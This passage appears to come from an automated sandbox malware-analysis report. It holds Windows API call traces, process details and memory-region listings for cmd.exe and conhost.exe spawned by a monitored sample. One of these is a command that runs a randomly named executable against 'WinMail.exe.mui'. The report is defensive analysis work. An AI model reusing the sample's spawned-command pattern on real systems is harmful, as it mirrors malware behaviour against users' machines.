SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0285.602] GetEnvironmentStringsW () returned 0x2c81a8* [0285.603] FreeEnvironmentStringsA (penv="=") returned 1 [0285.603] WaitForSingleObject (hHandle=0xa8, dwMilliseconds=0xffffffff) returned 0x0 [0293.173] GetExitCodeProcess (in: hProcess=0xa8, lpExitCode=0x1bf29c | out: lpExitCode=0x1bf29c*=0x0) returned 1 [0293.173] CloseHandle (hObject=0xa8) returned 1 [0293.173] _vsnwprintf (in: _Buffer=0x1bf384, _BufferCount=0x13, _Format="%08X", _ArgList=0x1bf2a4 | out: _Buffer="00000000") returned 8 [0293.173] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0293.173] GetEnvironmentStringsW () returned 0x2cbf90* [0293.173] FreeEnvironmentStringsA (penv="=") returned 1 [0293.173] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0293.173] GetEnvironmentStringsW () returned 0x2cbf90* [0293.173] FreeEnvironmentStringsA (penv="=") returned 1 [0293.173] DeleteProcThreadAttributeList (in: lpAttributeList=0x1bf330 | out: lpAttributeList=0x1bf330) [0293.173] _get_osfhandle (_FileHandle=1) returned 0x3c [0293.173] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0293.217] _get_osfhandle (_FileHandle=1) returned 0x3c [0293.217] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x13fe40c | out: lpMode=0x13fe40c) returned 1 [0293.217] _get_osfhandle (_FileHandle=0) returned 0x38 [0293.217] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x13fe408 | out: lpMode=0x13fe408) returned 1 [0293.217] SetConsoleInputExeNameW () returned 0x1 [0293.217] GetConsoleOutputCP () returned 0x1b5 [0293.218] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x13fe460 | out: lpCPInfo=0x13fe460) returned 1 [0293.218] SetThreadUILanguage (LangId=0x0) returned 0x409 [0293.218] exit (_Code=0) Thread: id = 935 os_tid = 0x978 Process: id = "116" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x171f3000" os_pid = "0xe58" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "115" os_parent_pid = "0xdf0" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00013c81" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 8333 start_va = 0x7f357000 end_va = 0x7f357fff entry_point = 0x0 region_type = private name = "private_0x000000007f357000" filename = "" Region: id = 8334 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 8335 start_va = 0x43570c0000 end_va = 0x43570dffff entry_point = 0x0 region_type = private name = "private_0x00000043570c0000" filename = "" Region: id = 8336 start_va = 0x43570e0000 end_va = 0x43570f3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000043570e0000" filename = "" Region: id = 8337 start_va = 0x4357100000 end_va = 0x435713ffff entry_point = 0x0 region_type = private name = "private_0x0000004357100000" filename = "" Region: id = 8338 start_va = 0x7df5ff1f0000 end_va = 0x7ff5ff1effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff1f0000" filename = "" Region: id = 8339 start_va = 0x7ff7fc9d0000 end_va = 0x7ff7fc9f2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff7fc9d0000" filename = "" Region: id = 8340 start_va = 0x7ff7fc9fb000 end_va = 0x7ff7fc9fbfff entry_point = 0x0 region_type = private name = "private_0x00007ff7fc9fb000" filename = "" Region: id = 8341 start_va = 0x7ff7fc9fe000 end_va = 0x7ff7fc9fffff entry_point = 0x0 region_type = private name = "private_0x00007ff7fc9fe000" filename = "" Region: id = 8342 start_va = 0x7ff7fd4c0000 end_va = 0x7ff7fd4d0fff entry_point = 0x7ff7fd4c0000 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 8343 start_va = 0x7ffaf7a10000 end_va = 0x7ffaf7bd1fff entry_point = 0x7ffaf7a10000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 8344 start_va = 0x43570c0000 end_va = 0x43570cffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000043570c0000" filename = "" Region: id = 8345 start_va = 0x4357140000 end_va = 0x43571fdfff entry_point = 0x4357140000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 8346 start_va = 0x4357320000 end_va = 0x435741ffff entry_point = 0x0 region_type = private name = "private_0x0000004357320000" filename = "" Region: id = 8347 start_va = 0x7ff7fc8d0000 end_va = 0x7ff7fc9cffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff7fc8d0000" filename = "" Region: id = 8348 start_va = 0x7ffaf4e50000 end_va = 0x7ffaf502cfff entry_point = 0x7ffaf4e50000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 8349 start_va = 0x7ffaf5700000 end_va = 0x7ffaf579cfff entry_point = 0x7ffaf5700000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 8350 start_va = 0x7ffaf70d0000 end_va = 0x7ffaf717cfff entry_point = 0x7ffaf70d0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 8351 start_va = 0x4357200000 end_va = 0x435723ffff entry_point = 0x0 region_type = private name = "private_0x0000004357200000" filename = "" Region: id = 8352 start_va = 0x4357240000 end_va = 0x435727ffff entry_point = 0x0 region_type = private name = "private_0x0000004357240000" filename = "" Region: id = 8353 start_va = 0x7ff7fc9fc000 end_va = 0x7ff7fc9fdfff entry_point = 0x0 region_type = private name = "private_0x00007ff7fc9fc000" filename = "" Region: id = 8354 start_va = 0x43570d0000 end_va = 0x43570d6fff entry_point = 0x0 region_type = private name = "private_0x00000043570d0000" filename = "" Region: id = 8355 start_va = 0x7ffaed340000 end_va = 0x7ffaed392fff entry_point = 0x7ffaed340000 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 8356 start_va = 0x4357240000 end_va = 0x4357240fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000004357240000" filename = "" Region: id = 8357 start_va = 0x4357270000 end_va = 0x435727ffff entry_point = 0x0 region_type = private name = "private_0x0000004357270000" filename = "" Region: id = 8358 start_va = 0x7ffaf72e0000 end_va = 0x7ffaf755bfff entry_point = 0x7ffaf72e0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 8359 start_va = 0x7ffaf5290000 end_va = 0x7ffaf53b5fff entry_point = 0x7ffaf5290000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 8360 start_va = 0x7ffaf5140000 end_va = 0x7ffaf528dfff entry_point = 0x7ffaf5140000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 8361 start_va = 0x7ffaf5800000 end_va = 0x7ffaf5984fff entry_point = 0x7ffaf5800000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 8362 start_va = 0x7ffaf55b0000 end_va = 0x7ffaf56f0fff entry_point = 0x7ffaf55b0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 8363 start_va = 0x7ffaf57a0000 end_va = 0x7ffaf57fafff entry_point = 0x7ffaf57a0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 8364 start_va = 0x4357250000 end_va = 0x4357256fff entry_point = 0x0 region_type = private name = "private_0x0000004357250000" filename = "" Region: id = 8365 start_va = 0x7ffaf1040000 end_va = 0x7ffaf11c2fff entry_point = 0x7ffaf1040000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 8366 start_va = 0x7ffaf7190000 end_va = 0x7ffaf724dfff entry_point = 0x7ffaf7190000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 8367 start_va = 0x7ffaf53c0000 end_va = 0x7ffaf53f5fff entry_point = 0x7ffaf53c0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 8368 start_va = 0x7ffaf6f70000 end_va = 0x7ffaf70cbfff entry_point = 0x7ffaf6f70000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 8369 start_va = 0x4357260000 end_va = 0x4357260fff entry_point = 0x0 region_type = private name = "private_0x0000004357260000" filename = "" Region: id = 8370 start_va = 0x4357280000 end_va = 0x4357280fff entry_point = 0x0 region_type = private name = "private_0x0000004357280000" filename = "" Region: id = 8371 start_va = 0x4357420000 end_va = 0x43575a7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000004357420000" filename = "" Region: id = 8372 start_va = 0x43575b0000 end_va = 0x4357730fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000043575b0000" filename = "" Region: id = 8373 start_va = 0x4357740000 end_va = 0x4358b3ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000004357740000" filename = "" Region: id = 8374 start_va = 0x4357290000 end_va = 0x43572dffff entry_point = 0x0 region_type = private name = "private_0x0000004357290000" filename = "" Region: id = 8395 start_va = 0x4357290000 end_va = 0x43572cffff entry_point = 0x0 region_type = private name = "private_0x0000004357290000" filename = "" Region: id = 8396 start_va = 0x43572d0000 end_va = 0x43572dffff entry_point = 0x0 region_type = private name = "private_0x00000043572d0000" filename = "" Region: id = 8397 start_va = 0x7ff7fc9f9000 end_va = 0x7ff7fc9fafff entry_point = 0x0 region_type = private name = "private_0x00007ff7fc9f9000" filename = "" Region: id = 8398 start_va = 0x7ffaf5990000 end_va = 0x7ffaf6eb4fff entry_point = 0x7ffaf5990000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 8399 start_va = 0x7ffaf4590000 end_va = 0x7ffaf4bb7fff entry_point = 0x7ffaf4590000 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 8400 start_va = 0x7ffaf75d0000 end_va = 0x7ffaf7675fff entry_point = 0x7ffaf75d0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 8401 start_va = 0x7ffaf7860000 end_va = 0x7ffaf78b0fff entry_point = 0x7ffaf7860000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 8402 start_va = 0x7ffaf44d0000 end_va = 0x7ffaf44defff entry_point = 0x7ffaf44d0000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 8403 start_va = 0x7ffaf4bc0000 end_va = 0x7ffaf4c72fff entry_point = 0x7ffaf4bc0000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 8404 start_va = 0x7ffaf4440000 end_va = 0x7ffaf4489fff entry_point = 0x7ffaf4440000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 8405 start_va = 0x7ffaf4490000 end_va = 0x7ffaf44a2fff entry_point = 0x7ffaf4490000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 8406 start_va = 0x7ffaf2d10000 end_va = 0x7ffaf2da5fff entry_point = 0x7ffaf2d10000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 8407 start_va = 0x4358b40000 end_va = 0x4358cfffff entry_point = 0x0 region_type = private name = "private_0x0000004358b40000" filename = "" Region: id = 8439 start_va = 0x4358d00000 end_va = 0x4359036fff entry_point = 0x4358d00000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 8440 start_va = 0x4357100000 end_va = 0x4357120fff entry_point = 0x4357100000 region_type = mapped_file name = "cmd.exe.mui" filename = "\\Windows\\System32\\en-US\\cmd.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\cmd.exe.mui") Region: id = 8441 start_va = 0x4358b40000 end_va = 0x4358b98fff entry_point = 0x4358b40000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 8442 start_va = 0x4358cf0000 end_va = 0x4358cfffff entry_point = 0x0 region_type = private name = "private_0x0000004358cf0000" filename = "" Region: id = 8453 start_va = 0x4359040000 end_va = 0x435925dfff entry_point = 0x0 region_type = private name = "private_0x0000004359040000" filename = "" Region: id = 8454 start_va = 0x4359260000 end_va = 0x4359475fff entry_point = 0x0 region_type = private name = "private_0x0000004359260000" filename = "" Region: id = 8455 start_va = 0x4358b40000 end_va = 0x4358c4dfff entry_point = 0x0 region_type = private name = "private_0x0000004358b40000" filename = "" Region: id = 8456 start_va = 0x4359480000 end_va = 0x4359696fff entry_point = 0x0 region_type = private name = "private_0x0000004359480000" filename = "" Region: id = 8457 start_va = 0x43596a0000 end_va = 0x43597b2fff entry_point = 0x0 region_type = private name = "private_0x00000043596a0000" filename = "" Region: id = 8510 start_va = 0x4357100000 end_va = 0x435713ffff entry_point = 0x0 region_type = private name = "private_0x0000004357100000" filename = "" Region: id = 8511 start_va = 0x43572e0000 end_va = 0x43572e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000043572e0000" filename = "" Region: id = 8512 start_va = 0x7ff7fc9fe000 end_va = 0x7ff7fc9fffff entry_point = 0x0 region_type = private name = "private_0x00007ff7fc9fe000" filename = "" Region: id = 8513 start_va = 0x43597c0000 end_va = 0x4359877fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000043597c0000" filename = "" Region: id = 8514 start_va = 0x43572e0000 end_va = 0x43572e3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000043572e0000" filename = "" Region: id = 8515 start_va = 0x7ffaf24b0000 end_va = 0x7ffaf24d1fff entry_point = 0x7ffaf24b0000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 8516 start_va = 0x7ffaf2a00000 end_va = 0x7ffaf2a12fff entry_point = 0x7ffaf2a00000 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 8517 start_va = 0x7ffaf35e0000 end_va = 0x7ffaf3637fff entry_point = 0x7ffaf35e0000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 8518 start_va = 0x43572f0000 end_va = 0x43572f6fff entry_point = 0x0 region_type = private name = "private_0x00000043572f0000" filename = "" Region: id = 8519 start_va = 0x4357300000 end_va = 0x4357304fff entry_point = 0x4357300000 region_type = mapped_file name = "user32.dll.mui" filename = "\\Windows\\System32\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\user32.dll.mui") Region: id = 8520 start_va = 0x4357310000 end_va = 0x4357310fff entry_point = 0x4357310000 region_type = mapped_file name = "conhostv2.dll.mui" filename = "\\Windows\\System32\\en-US\\ConhostV2.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\conhostv2.dll.mui") Region: id = 8521 start_va = 0x4358c50000 end_va = 0x4358c51fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000004358c50000" filename = "" Region: id = 8522 start_va = 0x7ffaecc30000 end_va = 0x7ffaecea3fff entry_point = 0x7ffaecc30000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10240.16384_none_f41f7b285750ef43\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10240.16384_none_f41f7b285750ef43\\comctl32.dll") Region: id = 8523 start_va = 0x4358c60000 end_va = 0x4358c60fff entry_point = 0x4358c60000 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 8524 start_va = 0x4358c70000 end_va = 0x4358c71fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000004358c70000" filename = "" Region: id = 8525 start_va = 0x4358c60000 end_va = 0x4358c60fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000004358c60000" filename = "" Thread: id = 925 os_tid = 0xe5c Thread: id = 926 os_tid = 0x818 Thread: id = 927 os_tid = 0xee0 Thread: id = 933 os_tid = 0xf7c Process: id = "117" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x7abd5000" os_pid = "0xedc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "88" os_parent_pid = "0xf04" cmd_line = "C:\\Windows\\system32\\cmd.exe /c vIDhS3md.exe -accepteula \"WinMail.exe.mui\" -nobanner" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00013c81" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 8375 start_va = 0xcb0000 end_va = 0xccffff entry_point = 0x0 region_type = private name = "private_0x0000000000cb0000" filename = "" Region: id = 8376 start_va = 0xcd0000 end_va = 0xcd1fff entry_point = 0x0 region_type = private name = "private_0x0000000000cd0000" filename = "" Region: id = 8377 start_va = 0xce0000 end_va = 0xcf3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 8378 start_va = 0xd00000 end_va = 0xd3ffff entry_point = 0x0 region_type = private name = "private_0x0000000000d00000" filename = "" Region: id = 8379 start_va = 0xd40000 end_va = 0xe3ffff entry_point = 0x0 region_type = private name = "private_0x0000000000d40000" filename = "" Region: id = 8380 start_va = 0xe40000 end_va = 0xe43fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e40000" filename = "" Region: id = 8381 start_va = 0x13d0000 end_va = 0x141ffff entry_point = 0x13d0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 8382 start_va = 0x1420000 end_va = 0x541ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001420000" filename = "" Region: id = 8383 start_va = 0x77990000 end_va = 0x77b08fff entry_point = 0x77990000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 8384 start_va = 0x7e8a0000 end_va = 0x7e8c2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e8a0000" filename = "" Region: id = 8385 start_va = 0x7e8ca000 end_va = 0x7e8cafff entry_point = 0x0 region_type = private name = "private_0x000000007e8ca000" filename = "" Region: id = 8386 start_va = 0x7e8cc000 end_va = 0x7e8cefff entry_point = 0x0 region_type = private name = "private_0x000000007e8cc000" filename = "" Region: id = 8387 start_va = 0x7e8cf000 end_va = 0x7e8cffff entry_point = 0x0 region_type = private name = "private_0x000000007e8cf000" filename = "" Region: id = 8388 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 8389 start_va = 0x7fff0000 end_va = 0x7dfaf7a0ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 8390 start_va = 0x7dfaf7a10000 end_va = 0x7ffaf7a0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfaf7a10000" filename = "" Region: id = 8391 start_va = 0x7ffaf7a10000 end_va = 0x7ffaf7bd1fff entry_point = 0x7ffaf7a10000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 8392 start_va = 0x7ffaf7bd2000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffaf7bd2000" filename = "" Region: id = 8393 start_va = 0xe50000 end_va = 0xe50fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e50000" filename = "" Region: id = 8394 start_va = 0xe60000 end_va = 0xe61fff entry_point = 0x0 region_type = private name = "private_0x0000000000e60000" filename = "" Region: id = 8408 start_va = 0xff0000 end_va = 0xffffff entry_point = 0x0 region_type = private name = "private_0x0000000000ff0000" filename = "" Region: id = 8409 start_va = 0x73040000 end_va = 0x7308efff entry_point = 0x73040000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 8410 start_va = 0x73090000 end_va = 0x73102fff entry_point = 0x73090000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 8411 start_va = 0x75130000 end_va = 0x7521ffff entry_point = 0x75130000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 8412 start_va = 0x73030000 end_va = 0x73037fff entry_point = 0x73030000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 8413 start_va = 0x1000000 end_va = 0x125ffff entry_point = 0x0 region_type = private name = "private_0x0000000001000000" filename = "" Region: id = 8414 start_va = 0x75130000 end_va = 0x7521ffff entry_point = 0x75130000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 8415 start_va = 0x74d30000 end_va = 0x74ea5fff entry_point = 0x74d30000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 8416 start_va = 0xcb0000 end_va = 0xcbffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000cb0000" filename = "" Region: id = 8417 start_va = 0x7e7a0000 end_va = 0x7e89ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e7a0000" filename = "" Region: id = 8526 start_va = 0xe70000 end_va = 0xf2dfff entry_point = 0xe70000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 8527 start_va = 0x778d0000 end_va = 0x7798dfff entry_point = 0x778d0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 8528 start_va = 0xf30000 end_va = 0xf6ffff entry_point = 0x0 region_type = private name = "private_0x0000000000f30000" filename = "" Region: id = 8529 start_va = 0x1000000 end_va = 0x10fffff entry_point = 0x0 region_type = private name = "private_0x0000000001000000" filename = "" Region: id = 8530 start_va = 0x1160000 end_va = 0x125ffff entry_point = 0x0 region_type = private name = "private_0x0000000001160000" filename = "" Region: id = 8531 start_va = 0x5420000 end_va = 0x55fffff entry_point = 0x0 region_type = private name = "private_0x0000000005420000" filename = "" Region: id = 8532 start_va = 0x7e8c7000 end_va = 0x7e8c9fff entry_point = 0x0 region_type = private name = "private_0x000000007e8c7000" filename = "" Region: id = 8533 start_va = 0xcc0000 end_va = 0xcc3fff entry_point = 0x0 region_type = private name = "private_0x0000000000cc0000" filename = "" Region: id = 8570 start_va = 0xcd0000 end_va = 0xcd3fff entry_point = 0x0 region_type = private name = "private_0x0000000000cd0000" filename = "" Region: id = 8579 start_va = 0x5600000 end_va = 0x5936fff entry_point = 0x5600000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 928 os_tid = 0xb38 [0284.259] GetModuleHandleA (lpModuleName=0x0) returned 0x13d0000 [0284.259] __set_app_type (_Type=0x1) [0284.259] __p__fmode () returned 0x77984d6c [0284.259] __p__commode () returned 0x77985b1c [0284.259] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x13e36e0) returned 0x0 [0284.259] __getmainargs (in: _Argc=0x13f50e8, _Argv=0x13f50ec, _Env=0x13f50f0, _DoWildCard=0, _StartInfo=0x13f50fc | out: _Argc=0x13f50e8, _Argv=0x13f50ec, _Env=0x13f50f0) returned 0 [0284.260] GetCurrentThreadId () returned 0xb38 [0284.260] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xb38) returned 0x84 [0284.260] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75130000 [0284.260] GetProcAddress (hModule=0x75130000, lpProcName="SetThreadUILanguage") returned 0x75172780 [0284.260] SetThreadUILanguage (LangId=0x0) returned 0x409 [0284.285] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0284.285] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0xe3ff00 | out: phkResult=0xe3ff00*=0x0) returned 0x2 [0284.285] VirtualQuery (in: lpAddress=0xe3ff07, lpBuffer=0xe3feb8, dwLength=0x1c | out: lpBuffer=0xe3feb8*(BaseAddress=0xe3f000, AllocationBase=0xd40000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0284.285] VirtualQuery (in: lpAddress=0xd40000, lpBuffer=0xe3feb8, dwLength=0x1c | out: lpBuffer=0xe3feb8*(BaseAddress=0xd40000, AllocationBase=0xd40000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0284.285] VirtualQuery (in: lpAddress=0xd41000, lpBuffer=0xe3feb8, dwLength=0x1c | out: lpBuffer=0xe3feb8*(BaseAddress=0xd41000, AllocationBase=0xd40000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0284.285] VirtualQuery (in: lpAddress=0xd43000, lpBuffer=0xe3feb8, dwLength=0x1c | out: lpBuffer=0xe3feb8*(BaseAddress=0xd43000, AllocationBase=0xd40000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0284.285] VirtualQuery (in: lpAddress=0xe40000, lpBuffer=0xe3feb8, dwLength=0x1c | out: lpBuffer=0xe3feb8*(BaseAddress=0xe40000, 